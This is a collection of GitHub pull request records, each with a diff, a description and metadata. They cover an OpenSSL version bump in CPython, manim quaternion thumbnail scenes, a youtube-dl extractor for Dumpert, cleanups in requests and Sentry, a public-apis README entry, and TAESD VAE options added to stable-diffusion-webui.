@@ -35,7 +35,7 @@
<sqlite3Dir>$(ExternalsDir)sqlite-3.14.2.0\</sqlite3Dir>
<bz2Dir>$(ExternalsDir)bzip2-1.0.6\</bz2Dir>
<bsddbDir>$(ExternalsDir)bsddb-4.7.25.0</bsddbDir>
- <opensslDir>$(ExternalsDir)openssl-1.0.2q\</opensslDir>
+ <opensslDir>$(ExternalsDir)openssl-1.0.2s\</opensslDir>
<opensslIncludeDir>$(opensslDir)include32</opensslIncludeDir>
<opensslIncludeDir Condition="'$(ArchName)' == 'amd64'">$(opensslDir)include64</opensslIncludeDir>
<nasmDir>$(ExternalsDir)\nasm-2.11.06\</nasmDir>
diff --git a/PCbuild/readme.txt b/PCbuild/readme.txt
index 556a8f25ca983d..ab4b6d0760a770 100644
--- a/PCbuild/readme.txt
+++ b/PCbuild/readme.txt
@@ -192,7 +192,7 @@ _bz2
Homepage:
http://www.bzip.org/
_ssl
- Python wrapper for version 1.0.2o of the OpenSSL secure sockets
+ Python wrapper for version 1.0.2s of the OpenSSL secure sockets
library, which is built by ssl.vcxproj
Homepage:
http://www.openssl.org/
| <!--
Thanks for your contribution!
Please read this comment in its entirety. It's quite important.
# Pull Request title
It should be in the following format:
```
bpo-NNNN: Summary of the changes made
```
Where: bpo-NNNN refers to the issue number in the https://bugs.python.org.
Most PRs will require an issue number. Trivial changes, like fixing a typo, do not need an issue.
# Backport Pull Request title
If this is a backport PR (PR made against branches other than `master`),
please ensure that the PR title is in the following format:
```
[X.Y] <title from the original PR> (GH-NNNN)
```
Where: [X.Y] is the branch name, e.g. [3.6].
GH-NNNN refers to the PR number from `master`.
-->
<!-- issue-number: [bpo-34631](https://bugs.python.org/issue34631) -->
https://bugs.python.org/issue34631
<!-- /issue-number -->
| https://api.github.com/repos/python/cpython/pulls/14161 | 2019-06-17T15:45:20Z | 2019-06-17T16:33:12Z | 2019-06-17T16:33:12Z | 2019-06-17T16:33:28Z | 830 | python/cpython | 3,824 |
Quaternions | diff --git a/active_projects/quaternions.py b/active_projects/quaternions.py
index 191ee42758..484e444792 100644
--- a/active_projects/quaternions.py
+++ b/active_projects/quaternions.py
@@ -4778,7 +4778,8 @@ class HypersphereStereographicProjection(SpecialThreeDScene):
[-1, 1, 0, 0],
[0, 0, 1, 1],
[0, 1, -1, 1],
- ]
+ ],
+ "unit_labels_scale_factor": 1,
}
def construct(self):
@@ -4827,6 +4828,7 @@ def update_label(label):
return label
label.add_updater(update_label)
+ self.pink_dot_label = label
def get_pq_point():
point = self.project_quaternion(q_tracker.get_value())
@@ -4841,9 +4843,12 @@ def get_pq_point():
def get_pq_line():
point = get_pq_point()
norm = get_norm(point)
+ origin = self.axes.coords_to_point(0, 0, 0)
if norm > dot_radius:
+ point -= origin
point *= (norm - dot_radius) / norm
- result = Line(ORIGIN, point)
+ point += origin
+ result = Line(origin, point)
result.set_stroke(width=1)
return result
@@ -5114,6 +5119,7 @@ def get_unit_labels(self):
labels = VGroup()
for tex, coords, vect in tex_coords_vects:
label = TexMobject(tex)
+ label.scale(self.unit_labels_scale_factor)
label.rotate(90 * DEGREES, RIGHT)
label.next_to(c2p(*coords), vect, SMALL_BUFF)
labels.add(label)
@@ -5333,10 +5339,12 @@ def setup_multiplier_tracker(self):
def add_unit_labels(self):
labels = self.unit_labels = self.get_unit_labels()
one_label = TexMobject("1")
+ one_label.scale(self.unit_labels_scale_factor)
one_label.set_shade_in_3d(True)
one_label.rotate(90 * DEGREES, RIGHT)
one_label.next_to(ORIGIN, IN + RIGHT, SMALL_BUFF)
- self.add(labels, one_label)
+ labels.add(one_label)
+ self.add(labels)
def show_multiplication_by_i_on_circle_1i(self):
m_tracker = self.multiplier_tracker
@@ -6420,27 +6428,95 @@ class QuaternionEndscreen(PatreonEndScreen):
}
-class Thumbnail(RuleOfQuaternionMultiplication):
+class ThumbnailP1(RuleOfQuaternionMultiplication):
CONFIG = {
"three_d_axes_config": {
"num_axis_pieces": 20,
- }
+ },
+ "unit_labels_scale_factor": 1.5,
+ "quaternion": [1, 0, 0, 0],
}
def construct(self):
self.setup_all_trackers()
- quat = normalize([-0.5, 0.5, -0.5, 0.5])
- self.multiplier_tracker.set_value(quat)
- self.q_tracker.set_value(quat)
- sphere = self.get_projected_sphere(0, solid=False)
- # self.specially_color_sphere(sphere)
- # sphere.set_fill(opacity=0.5)
- sphere.set_fill_by_checkerboard(BLUE_E, BLUE, opacity=0.8)
- for face in sphere:
+ self.remove(self.pink_dot_label)
+ q_tracker = self.q_tracker
+ m_tracker = self.multiplier_tracker
+
+ # quat = normalize([-0.5, 0.5, -0.5, 0.5])
+ quat = normalize(self.quaternion)
+ m_tracker.set_value(quat)
+ q_tracker.set_value(quat)
+ proj_sphere = self.get_projected_sphere(0, solid=False)
+ # self.specially_color_sphere(proj_sphere)
+ proj_sphere.set_color_by_gradient(
+ BLUE, YELLOW
+ )
+ proj_sphere.set_stroke(WHITE)
+ proj_sphere.set_fill(opacity=0.4)
+ for i, face in enumerate(proj_sphere):
+ alpha = i / len(proj_sphere)
+ opacity = 0.7 * (1 - there_and_back(alpha))
+ face.set_fill(opacity=opacity)
+
+ # unit_sphere = self.get_projected_sphere(0, quaternion=[1, 0, 0, 0], solid=False)
+ # self.specially_color_sphere(unit_sphere)
+ # unit_sphere.set_stroke(width=0)
+ # proj_sphere.set_fill_by_checkerboard(BLUE_E, BLUE, opacity=0.8)
+ for face in proj_sphere:
face.points = face.points[::-1]
+ max_r = np.max(np.apply_along_axis(get_norm, 1, face.points))
+ if max_r > 30:
+ face.fade(1)
+
+ for label in self.unit_labels:
+ label.set_shade_in_3d(False)
+ label.set_background_stroke(color=BLACK, width=2)
+
+ self.add(proj_sphere)
+ # self.add(unit_sphere)
+
+ for mobject in self.mobjects:
+ try:
+ mobject.shift(IN)
+ except ValueError:
+ pass
self.set_camera_orientation(
phi=70 * DEGREES,
theta=-110 * DEGREES,
)
- self.add(sphere)
+
+
+class ThumbnailP2(ThumbnailP1):
+ CONFIG = {
+ "quaternion": [0, 1, 0, 0],
+ }
+
+
+class ThumbnailOverlay(Scene):
+ def construct(self):
+ title = TextMobject("Quaternions")
+ title.set_width(8)
+ title.to_edge(UP)
+ v_line = Line(DOWN, UP)
+ v_line.set_height(FRAME_HEIGHT)
+
+ title.set_background_stroke(color=BLACK, width=1)
+
+ rect = BackgroundRectangle(title[4:6])
+ rect.set_fill(opacity=1)
+ rect.stretch(0.9, 0)
+ rect.stretch(1.1, 1)
+ title.add_to_back(BackgroundRectangle(title[0]))
+ title.add_to_back(rect)
+
+ arrow = Arrow(LEFT, RIGHT)
+ arrow.scale(1.5)
+ arrow.tip.scale(2)
+ arrow.set_stroke(width=10)
+ arrow.set_color(YELLOW)
+
+ self.add(v_line)
+ self.add(arrow)
+ self.add(title)
diff --git a/scene/three_d_scene.py b/scene/three_d_scene.py
index 133f6d8969..430de9fa10 100644
--- a/scene/three_d_scene.py
+++ b/scene/three_d_scene.py
@@ -74,9 +74,11 @@ def get_moving_mobjects(self, *animations):
return moving_mobjects
def add_fixed_orientation_mobjects(self, *mobjects, **kwargs):
+ self.add(*mobjects)
self.camera.add_fixed_orientation_mobjects(*mobjects, **kwargs)
def add_fixed_in_frame_mobjects(self, *mobjects):
+ self.add(*mobjects)
self.camera.add_fixed_in_frame_mobjects(*mobjects)
def remove_fixed_orientation_mobjects(self, *mobjects):
diff --git a/utils/space_ops.py b/utils/space_ops.py
index 07d8ea494b..821e86acc3 100644
--- a/utils/space_ops.py
+++ b/utils/space_ops.py
@@ -7,13 +7,46 @@
from functools import reduce
from utils.iterables import adjacent_pairs
-# Matrix operations
-
def get_norm(vect):
return sum([x**2 for x in vect])**0.5
+# Quaternions
+# TODO, implement quaternion type
+
+
+def quaternion_mult(q1, q2):
+ w1, x1, y1, z1 = q1
+ w2, x2, y2, z2 = q2
+ return np.array([
+ w1 * w2 - x1 * x2 - y1 * y2 - z1 * z2,
+ w1 * x2 + x1 * w2 + y1 * z2 - z1 * y2,
+ w1 * y2 + y1 * w2 + z1 * x2 - x1 * z2,
+ w1 * z2 + z1 * w2 + x1 * y2 - y1 * x2,
+ ])
+
+
+def quaternion_from_angle_axis(angle, axis):
+ return np.append(
+ np.cos(angle / 2),
+ np.sin(angle / 2) * normalize(axis)
+ )
+
+
+def quaternion_conjugate(quaternion):
+ result = np.array(quaternion)
+ result[1:] *= -1
+ return result
+
+
+def rotate_vector(vector, angle, axis=OUT):
+ quat = quaternion_from_angle_axis(angle, axis)
+ quat_inv = quaternion_conjugate(quat)
+ product = reduce(quaternion_mult, [quat, vector, quat_inv])
+ return product[1:]
+
+
def thick_diagonal(dim, thickness=2):
row_indices = np.arange(dim).repeat(dim).reshape((dim, dim))
col_indices = np.transpose(row_indices)
@@ -64,10 +97,6 @@ def z_to_vector(vector):
return np.dot(rotation_about_z(theta), phi_down)
-def rotate_vector(vector, angle, axis=OUT):
- return np.dot(rotation_matrix(angle, axis), vector)
-
-
def angle_between(v1, v2):
return np.arccos(np.dot(
v1 / get_norm(v1),
| https://api.github.com/repos/3b1b/manim/pulls/287 | 2018-09-10T18:38:59Z | 2018-09-10T18:39:05Z | 2018-09-10T18:39:05Z | 2018-09-10T18:39:05Z | 2,200 | 3b1b/manim | 18,197 |
|
[Dumpert] Add new extractor | diff --git a/youtube_dl/extractor/__init__.py b/youtube_dl/extractor/__init__.py
index a65c0c25b81..43bac0252bf 100644
--- a/youtube_dl/extractor/__init__.py
+++ b/youtube_dl/extractor/__init__.py
@@ -115,6 +115,7 @@
from .drtv import DRTVIE
from .dvtv import DVTVIE
from .dump import DumpIE
+from .dumpert import DumpertIE
from .defense import DefenseGouvFrIE
from .discovery import DiscoveryIE
from .divxstage import DivxStageIE
diff --git a/youtube_dl/extractor/dumpert.py b/youtube_dl/extractor/dumpert.py
new file mode 100644
index 00000000000..52d07deac00
--- /dev/null
+++ b/youtube_dl/extractor/dumpert.py
@@ -0,0 +1,47 @@
+# coding: utf-8
+from __future__ import unicode_literals
+
+import base64
+
+from .common import InfoExtractor
+
+
+class DumpertIE(InfoExtractor):
+ _VALID_URL = (r'https?://(?:www\.)?dumpert\.nl/mediabase/'
+ r'(?P<id>[0-9]+/[0-9a-zA-Z]+)/?.*')
+ _TEST = {
+ 'url': 'http://www.dumpert.nl/mediabase/6646981/951bc60f/',
+ 'md5': '1b9318d7d5054e7dcb9dc7654f21d643',
+ 'info_dict': {
+ 'id': '6646981/951bc60f',
+ 'ext': 'mp4',
+ 'title': 'Ik heb nieuws voor je',
+ 'description': 'Niet schrikken hoor'
+ }
+ }
+
+ def _real_extract(self, url):
+ video_id = self._match_id(url)
+ webpage = self._download_webpage(url, video_id)
+
+ title = self._html_search_meta('title', webpage)
+ description = self._html_search_meta('description', webpage)
+
+ files_base64 = self._html_search_regex(r'data-files="(.*?)"',
+ webpage,
+ 'files')
+ files_json = base64.b64decode(files_base64).decode('iso-8859-1')
+ files = self._parse_json(files_json, video_id)
+
+ format_names = ['flv', 'mobile', 'tablet', '720p']
+ formats = [{'format_id': name,
+ 'url': files[name].replace(r'\/', '/')}
+ for name in format_names
+ if name in files]
+
+ return {
+ 'id': video_id,
+ 'title': title,
+ 'description': description,
+ 'formats': formats
+ }
| Add support for the Dutch video site Dumpert. http://www.dumpert.nl/
| https://api.github.com/repos/ytdl-org/youtube-dl/pulls/5319 | 2015-03-29T21:44:32Z | 2015-03-30T14:12:37Z | 2015-03-30T14:12:37Z | 2019-09-29T18:44:07Z | 667 | ytdl-org/youtube-dl | 50,156 |
Remove unused module from tests | diff --git a/tests/test_requests.py b/tests/test_requests.py
index b0cb7d6b7e..b57056914d 100755
--- a/tests/test_requests.py
+++ b/tests/test_requests.py
@@ -20,7 +20,7 @@
Morsel, cookielib, getproxies, str, urlparse,
builtin_str, OrderedDict)
from requests.cookies import (
- cookiejar_from_dict, morsel_to_cookie, merge_cookies)
+ cookiejar_from_dict, morsel_to_cookie)
from requests.exceptions import (
ConnectionError, ConnectTimeout, InvalidSchema, InvalidURL,
MissingSchema, ReadTimeout, Timeout, RetryError, TooManyRedirects,
@@ -2293,4 +2293,3 @@ def test_parameters_for_nonstandard_schemes(self, input, params, expected):
r = requests.Request('GET', url=input, params=params)
p = r.prepare()
assert p.url == expected
-
diff --git a/tests/test_utils.py b/tests/test_utils.py
index 8d5ade9c8a..1edf6218c4 100644
--- a/tests/test_utils.py
+++ b/tests/test_utils.py
@@ -4,7 +4,7 @@
import pytest
from requests import compat
-from requests.cookies import RequestsCookieJar, cookiejar_from_dict
+from requests.cookies import RequestsCookieJar
from requests.structures import CaseInsensitiveDict
from requests.utils import (
address_in_network, dotted_netmask,
| merge_cookies and cookiejar_from_dict functions are already tested by other test functions. | https://api.github.com/repos/psf/requests/pulls/3809 | 2017-01-11T09:41:59Z | 2017-01-11T09:49:59Z | 2017-01-11T09:49:59Z | 2021-09-08T01:21:26Z | 321 | psf/requests | 32,338 |
fix(trace-view): Doing the TODO that was waiting on py 3.7+ | diff --git a/src/sentry/api/endpoints/organization_events_trace.py b/src/sentry/api/endpoints/organization_events_trace.py
index dc12081142437..38ec570f1e02f 100644
--- a/src/sentry/api/endpoints/organization_events_trace.py
+++ b/src/sentry/api/endpoints/organization_events_trace.py
@@ -1,5 +1,5 @@
import logging
-from collections import OrderedDict, defaultdict, deque
+from collections import defaultdict, deque
from typing import (
TYPE_CHECKING,
Any,
@@ -561,10 +561,7 @@ def serialize(
parent_map = self.construct_parent_map(transactions)
error_map = self.construct_error_map(errors)
parent_events: Dict[str, TraceEvent] = {}
- # TODO(3.7): Dictionary ordering in py3.6 is an implementation detail, using an OrderedDict because this way
- # we try to guarantee in py3.6 that the first item is the root. We can switch back to a normal dict when we're
- # on python 3.7.
- results_map: Dict[Optional[str], List[TraceEvent]] = OrderedDict()
+ results_map: Dict[Optional[str], List[TraceEvent]] = defaultdict(list)
to_check: Deque[SnubaTransaction] = deque()
# The root of the orphan tree we're currently navigating through
orphan_root: Optional[SnubaTransaction] = None
@@ -596,11 +593,7 @@ def serialize(
# Used to avoid removing the orphan from results entirely if we loop
orphan_root = current_event
- # not using a defaultdict here as a DefaultOrderedDict isn't worth the effort
- if parent_span_id in results_map:
- results_map[parent_span_id].append(previous_event)
- else:
- results_map[parent_span_id] = [previous_event]
+ results_map[parent_span_id].append(previous_event)
else:
current_event = to_check.popleft()
previous_event = parent_events[current_event["id"]]
| - Now that we're on py3.8 we know that dictionaries will be ordered,
which maens we can use the defaultdict and know that order is
preserved | https://api.github.com/repos/getsentry/sentry/pulls/29512 | 2021-10-22T14:59:30Z | 2021-10-25T15:57:03Z | 2021-10-25T15:57:03Z | 2021-11-10T00:01:36Z | 441 | getsentry/sentry | 44,175 |
Add host-t.com DNS API | diff --git a/README.md b/README.md
index 4ae14d3c20..042c560677 100644
--- a/README.md
+++ b/README.md
@@ -309,6 +309,7 @@ API | Description | Auth | HTTPS | CORS |
| [Glitterly](https://developers.glitterly.app) | Image generation API | `apiKey` | Yes | Yes |
| [Gorest](https://gorest.co.in/) | Online REST API for Testing and Prototyping | `OAuth` | Yes | Unknown |
| [Hexabin](https://hexabin.herokuapp.com/) | Convert and retrieve hexadecimal, binary, decimal, and octal values with ease | No | No | Unknown |
+| [host-t.com](https://host-t.com) | Basic DNS query via HTTP GET request | No | Yes | No |
| [Host.io](https://host.io) | Domains Data API for Developers | `apiKey` | Yes | Yes |
| [HTTP2.Pro](https://http2.pro/doc/api) | Test endpoints for client and server HTTP/2 protocol support | No | Yes | Unknown |
| [IBM Text to Speech](https://cloud.ibm.com/docs/text-to-speech/getting-started.html) | Convert text to speech | `apiKey` | Yes | Yes |
| <!-- Thank you for taking the time to work on a Pull Request for this project! -->
<!-- To ensure your PR is dealt with swiftly please check the following: -->
- [x] My submission is formatted according to the guidelines in the [contributing guide](CONTRIBUTING.md)
- [x] My addition is ordered alphabetically
- [x] My submission has a useful description
- [x] The description does not end with punctuation
- [x] Each table column is padded with one space on either side
- [x] I have searched the repository for any relevant issues or pull requests
- [x] Any category I am creating has the minimum requirement of 3 items
- [x] All changes have been [squashed][squash-link] into a single commit
[squash-link]: <https://github.com/todotxt/todo.txt-android/wiki/Squash-All-Commits-Related-to-a-Single-Issue-into-a-Single-Commit>
| https://api.github.com/repos/public-apis/public-apis/pulls/1825 | 2021-07-06T08:54:24Z | 2021-07-21T01:25:54Z | 2021-07-21T01:25:54Z | 2021-07-21T01:25:55Z | 279 | public-apis/public-apis | 35,453 |
Add TAESD(or more) options for all the VAE encode/decode operation | diff --git a/modules/generation_parameters_copypaste.py b/modules/generation_parameters_copypaste.py
index 4e2865587a2..593abfef326 100644
--- a/modules/generation_parameters_copypaste.py
+++ b/modules/generation_parameters_copypaste.py
@@ -307,6 +307,12 @@ def parse_generation_parameters(x: str):
if "Schedule rho" not in res:
res["Schedule rho"] = 0
+ if "VAE Encoder" not in res:
+ res["VAE Encoder"] = "Full"
+
+ if "VAE Decoder" not in res:
+ res["VAE Decoder"] = "Full"
+
return res
@@ -332,6 +338,8 @@ def parse_generation_parameters(x: str):
('RNG', 'randn_source'),
('NGMS', 's_min_uncond'),
('Pad conds', 'pad_cond_uncond'),
+ ('VAE Encoder', 'sd_vae_encode_method'),
+ ('VAE Decoder', 'sd_vae_decode_method'),
]
diff --git a/modules/processing.py b/modules/processing.py
index ae58b108a41..43cb763feb1 100644
--- a/modules/processing.py
+++ b/modules/processing.py
@@ -16,6 +16,7 @@
import modules.sd_hijack
from modules import devices, prompt_parser, masking, sd_samplers, lowvram, generation_parameters_copypaste, extra_networks, sd_vae_approx, scripts, sd_samplers_common, sd_unet, errors
from modules.sd_hijack import model_hijack
+from modules.sd_samplers_common import images_tensor_to_samples, decode_first_stage, approximation_indexes
from modules.shared import opts, cmd_opts, state
import modules.shared as shared
import modules.paths as paths
@@ -30,7 +31,6 @@
from einops import repeat, rearrange
from blendmodes.blend import blendLayers, BlendType
-decode_first_stage = sd_samplers_common.decode_first_stage
# some of those options should not be changed at all because they would break the model, so I removed them from options.
opt_C = 4
@@ -84,7 +84,7 @@ def txt2img_image_conditioning(sd_model, x, width, height):
# The "masked-image" in this case will just be all zeros since the entire image is masked.
image_conditioning = torch.zeros(x.shape[0], 3, height, width, device=x.device)
- image_conditioning = sd_model.get_first_stage_encoding(sd_model.encode_first_stage(image_conditioning))
+ image_conditioning = images_tensor_to_samples(image_conditioning, approximation_indexes.get(opts.sd_vae_encode_method))
# Add the fake full 1s mask to the first dimension.
image_conditioning = torch.nn.functional.pad(image_conditioning, (0, 0, 0, 0, 1, 0), value=1.0)
@@ -203,7 +203,7 @@ def depth2img_image_conditioning(self, source_image):
midas_in = torch.from_numpy(transformed["midas_in"][None, ...]).to(device=shared.device)
midas_in = repeat(midas_in, "1 ... -> n ...", n=self.batch_size)
- conditioning_image = self.sd_model.get_first_stage_encoding(self.sd_model.encode_first_stage(source_image))
+ conditioning_image = images_tensor_to_samples(source_image*0.5+0.5, approximation_indexes.get(opts.sd_vae_encode_method))
conditioning = torch.nn.functional.interpolate(
self.sd_model.depth_model(midas_in),
size=conditioning_image.shape[2:],
@@ -216,7 +216,7 @@ def depth2img_image_conditioning(self, source_image):
return conditioning
def edit_image_conditioning(self, source_image):
- conditioning_image = self.sd_model.encode_first_stage(source_image).mode()
+ conditioning_image = images_tensor_to_samples(source_image*0.5+0.5, approximation_indexes.get(opts.sd_vae_encode_method))
return conditioning_image
@@ -795,6 +795,7 @@ def process_images_inner(p: StableDiffusionProcessing) -> Processed:
if getattr(samples_ddim, 'already_decoded', False):
x_samples_ddim = samples_ddim
else:
+ p.extra_generation_params['VAE Decoder'] = opts.sd_vae_decode_method
x_samples_ddim = decode_latent_batch(p.sd_model, samples_ddim, target_device=devices.cpu, check_for_nans=True)
x_samples_ddim = torch.stack(x_samples_ddim).float()
@@ -1135,11 +1136,10 @@ def save_intermediate(image, index):
batch_images.append(image)
decoded_samples = torch.from_numpy(np.array(batch_images))
- decoded_samples = decoded_samples.to(shared.device)
- decoded_samples = 2. * decoded_samples - 1.
decoded_samples = decoded_samples.to(shared.device, dtype=devices.dtype_vae)
- samples = self.sd_model.get_first_stage_encoding(self.sd_model.encode_first_stage(decoded_samples))
+ self.extra_generation_params['VAE Encoder'] = opts.sd_vae_encode_method
+ samples = images_tensor_to_samples(decoded_samples, approximation_indexes.get(opts.sd_vae_encode_method))
image_conditioning = self.img2img_image_conditioning(decoded_samples, samples)
@@ -1374,10 +1374,9 @@ def init(self, all_prompts, all_seeds, all_subseeds):
raise RuntimeError(f"bad number of images passed: {len(imgs)}; expecting {self.batch_size} or less")
image = torch.from_numpy(batch_images)
- image = 2. * image - 1.
image = image.to(shared.device, dtype=devices.dtype_vae)
-
- self.init_latent = self.sd_model.get_first_stage_encoding(self.sd_model.encode_first_stage(image))
+ self.extra_generation_params['VAE Encoder'] = opts.sd_vae_encode_method
+ self.init_latent = images_tensor_to_samples(image, approximation_indexes.get(opts.sd_vae_encode_method), self.sd_model)
devices.torch_gc()
if self.resize_mode == 3:
diff --git a/modules/sd_samplers_common.py b/modules/sd_samplers_common.py
index b3d344e777b..42a29fc9c95 100644
--- a/modules/sd_samplers_common.py
+++ b/modules/sd_samplers_common.py
@@ -23,19 +23,29 @@ def setup_img2img_steps(p, steps=None):
approximation_indexes = {"Full": 0, "Approx NN": 1, "Approx cheap": 2, "TAESD": 3}
-def single_sample_to_image(sample, approximation=None):
+def samples_to_images_tensor(sample, approximation=None, model=None):
+ '''latents -> images [-1, 1]'''
if approximation is None:
approximation = approximation_indexes.get(opts.show_progress_type, 0)
if approximation == 2:
- x_sample = sd_vae_approx.cheap_approximation(sample) * 0.5 + 0.5
+ x_sample = sd_vae_approx.cheap_approximation(sample)
elif approximation == 1:
- x_sample = sd_vae_approx.model()(sample.to(devices.device, devices.dtype).unsqueeze(0))[0].detach() * 0.5 + 0.5
+ x_sample = sd_vae_approx.model()(sample.to(devices.device, devices.dtype)).detach()
elif approximation == 3:
x_sample = sample * 1.5
- x_sample = sd_vae_taesd.model()(x_sample.to(devices.device, devices.dtype).unsqueeze(0))[0].detach()
+ x_sample = sd_vae_taesd.decoder_model()(x_sample.to(devices.device, devices.dtype)).detach()
+ x_sample = x_sample * 2 - 1
else:
- x_sample = decode_first_stage(shared.sd_model, sample.unsqueeze(0))[0] * 0.5 + 0.5
+ if model is None:
+ model = shared.sd_model
+ x_sample = model.decode_first_stage(sample)
+
+ return x_sample
+
+
+def single_sample_to_image(sample, approximation=None):
+ x_sample = samples_to_images_tensor(sample.unsqueeze(0), approximation)[0] * 0.5 + 0.5
x_sample = torch.clamp(x_sample, min=0.0, max=1.0)
x_sample = 255. * np.moveaxis(x_sample.cpu().numpy(), 0, 2)
@@ -45,9 +55,9 @@ def single_sample_to_image(sample, approximation=None):
def decode_first_stage(model, x):
- x = model.decode_first_stage(x.to(devices.dtype_vae))
-
- return x
+ x = x.to(devices.dtype_vae)
+ approx_index = approximation_indexes.get(opts.sd_vae_decode_method, 0)
+ return samples_to_images_tensor(x, approx_index, model)
def sample_to_image(samples, index=0, approximation=None):
@@ -58,6 +68,24 @@ def samples_to_image_grid(samples, approximation=None):
return images.image_grid([single_sample_to_image(sample, approximation) for sample in samples])
+def images_tensor_to_samples(image, approximation=None, model=None):
+ '''image[0, 1] -> latent'''
+ if approximation is None:
+ approximation = approximation_indexes.get(opts.sd_vae_encode_method, 0)
+
+ if approximation == 3:
+ image = image.to(devices.device, devices.dtype)
+ x_latent = sd_vae_taesd.encoder_model()(image)
+ else:
+ if model is None:
+ model = shared.sd_model
+ image = image.to(shared.device, dtype=devices.dtype_vae)
+ image = image * 2 - 1
+ x_latent = model.get_first_stage_encoding(model.encode_first_stage(image))
+
+ return x_latent
+
+
def store_latent(decoded):
state.current_latent = decoded
diff --git a/modules/sd_vae_approx.py b/modules/sd_vae_approx.py
index 86bd658ad32..3965e223e6f 100644
--- a/modules/sd_vae_approx.py
+++ b/modules/sd_vae_approx.py
@@ -81,6 +81,6 @@ def cheap_approximation(sample):
coefs = torch.tensor(coeffs).to(sample.device)
- x_sample = torch.einsum("lxy,lr -> rxy", sample, coefs)
+ x_sample = torch.einsum("...lxy,lr -> ...rxy", sample, coefs)
return x_sample
diff --git a/modules/sd_vae_taesd.py b/modules/sd_vae_taesd.py
index 5bf7c76e1dd..808eb3624fd 100644
--- a/modules/sd_vae_taesd.py
+++ b/modules/sd_vae_taesd.py
@@ -44,7 +44,17 @@ def decoder():
)
-class TAESD(nn.Module):
+def encoder():
+ return nn.Sequential(
+ conv(3, 64), Block(64, 64),
+ conv(64, 64, stride=2, bias=False), Block(64, 64), Block(64, 64), Block(64, 64),
+ conv(64, 64, stride=2, bias=False), Block(64, 64), Block(64, 64), Block(64, 64),
+ conv(64, 64, stride=2, bias=False), Block(64, 64), Block(64, 64), Block(64, 64),
+ conv(64, 4),
+ )
+
+
+class TAESDDecoder(nn.Module):
latent_magnitude = 3
latent_shift = 0.5
@@ -55,21 +65,28 @@ def __init__(self, decoder_path="taesd_decoder.pth"):
self.decoder.load_state_dict(
torch.load(decoder_path, map_location='cpu' if devices.device.type != 'cuda' else None))
- @staticmethod
- def unscale_latents(x):
- """[0, 1] -> raw latents"""
- return x.sub(TAESD.latent_shift).mul(2 * TAESD.latent_magnitude)
+
+class TAESDEncoder(nn.Module):
+ latent_magnitude = 3
+ latent_shift = 0.5
+
+ def __init__(self, encoder_path="taesd_encoder.pth"):
+ """Initialize pretrained TAESD on the given device from the given checkpoints."""
+ super().__init__()
+ self.encoder = encoder()
+ self.encoder.load_state_dict(
+ torch.load(encoder_path, map_location='cpu' if devices.device.type != 'cuda' else None))
def download_model(model_path, model_url):
if not os.path.exists(model_path):
os.makedirs(os.path.dirname(model_path), exist_ok=True)
- print(f'Downloading TAESD decoder to: {model_path}')
+ print(f'Downloading TAESD model to: {model_path}')
torch.hub.download_url_to_file(model_url, model_path)
-def model():
+def decoder_model():
model_name = "taesdxl_decoder.pth" if getattr(shared.sd_model, 'is_sdxl', False) else "taesd_decoder.pth"
loaded_model = sd_vae_taesd_models.get(model_name)
@@ -78,7 +95,7 @@ def model():
download_model(model_path, 'https://github.com/madebyollin/taesd/raw/main/' + model_name)
if os.path.exists(model_path):
- loaded_model = TAESD(model_path)
+ loaded_model = TAESDDecoder(model_path)
loaded_model.eval()
loaded_model.to(devices.device, devices.dtype)
sd_vae_taesd_models[model_name] = loaded_model
@@ -86,3 +103,22 @@ def model():
raise FileNotFoundError('TAESD model not found')
return loaded_model.decoder
+
+
+def encoder_model():
+ model_name = "taesdxl_encoder.pth" if getattr(shared.sd_model, 'is_sdxl', False) else "taesd_encoder.pth"
+ loaded_model = sd_vae_taesd_models.get(model_name)
+
+ if loaded_model is None:
+ model_path = os.path.join(paths_internal.models_path, "VAE-taesd", model_name)
+ download_model(model_path, 'https://github.com/madebyollin/taesd/raw/main/' + model_name)
+
+ if os.path.exists(model_path):
+ loaded_model = TAESDEncoder(model_path)
+ loaded_model.eval()
+ loaded_model.to(devices.device, devices.dtype)
+ sd_vae_taesd_models[model_name] = loaded_model
+ else:
+ raise FileNotFoundError('TAESD model not found')
+
+ return loaded_model.encoder
diff --git a/modules/shared.py b/modules/shared.py
index 8245250a5a2..516ad7e8052 100644
--- a/modules/shared.py
+++ b/modules/shared.py
@@ -435,6 +435,8 @@ def list_samplers():
"upcast_attn": OptionInfo(False, "Upcast cross attention layer to float32"),
"auto_vae_precision": OptionInfo(True, "Automaticlly revert VAE to 32-bit floats").info("triggers when a tensor with NaNs is produced in VAE; disabling the option in this case will result in a black square image"),
"randn_source": OptionInfo("GPU", "Random number generator source.", gr.Radio, {"choices": ["GPU", "CPU", "NV"]}).info("changes seeds drastically; use CPU to produce the same picture across different videocard vendors; use NV to produce same picture as on NVidia videocards"),
+ "sd_vae_encode_method": OptionInfo("Full", "VAE type for encode", gr.Radio, {"choices": ["Full", "TAESD"]}).info("method to encode image to latent (use in img2img, hires-fix or inpaint mask)"),
+ "sd_vae_decode_method": OptionInfo("Full", "VAE type for decode", gr.Radio, {"choices": ["Full", "TAESD"]}).info("method to decode latent to image"),
}))
options_templates.update(options_section(('sdxl', "Stable Diffusion XL"), {
| ## Description
TAESD have been added as a fast live preview method. And it actually can be seen as a normal VAE (with some quality degrad)
Since some user may prefer faster speed or want to generate larger image with limited vram, I think add TAESD as a usable method for all the VAE operation is a good idea so I open this PR.
At first I only implement TAESD encoder and replace all the latent encode/decode in the processing.py. I think tiled VAE also can be taken as a built-in VAE method as well.
(For example, t2i -> Full decode -> img -> TAESD encode -> i2i -> Tiled decode -> final big image)
I will leave this pr as draft to see if we should implement all the things in this PR (second pass vae, built-in tiled vae etc.)
## some example for TAESD encode/decode
Full VAE vs TAESD
![vae_compare_2](https://github.com/AUTOMATIC1111/stable-diffusion-webui/assets/59680068/075caaa3-0a6c-447d-8ba3-5c24700bee16)
4K Image generated with example workflow above in SD1.5 model (take 8G vram for whole process):
(t2i 1024x576, hires fix to 3840x2160)
![00571](https://github.com/AUTOMATIC1111/stable-diffusion-webui/assets/59680068/d349db50-67b4-435f-b325-93aa41d08e16)
## Checklist:
- [x] I have read [contributing wiki page](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing)
- [x] I have performed a self-review of my own code
- [x] My code follows the [style guidelines](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing#code-style)
- [x] My code passes [tests](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Tests)
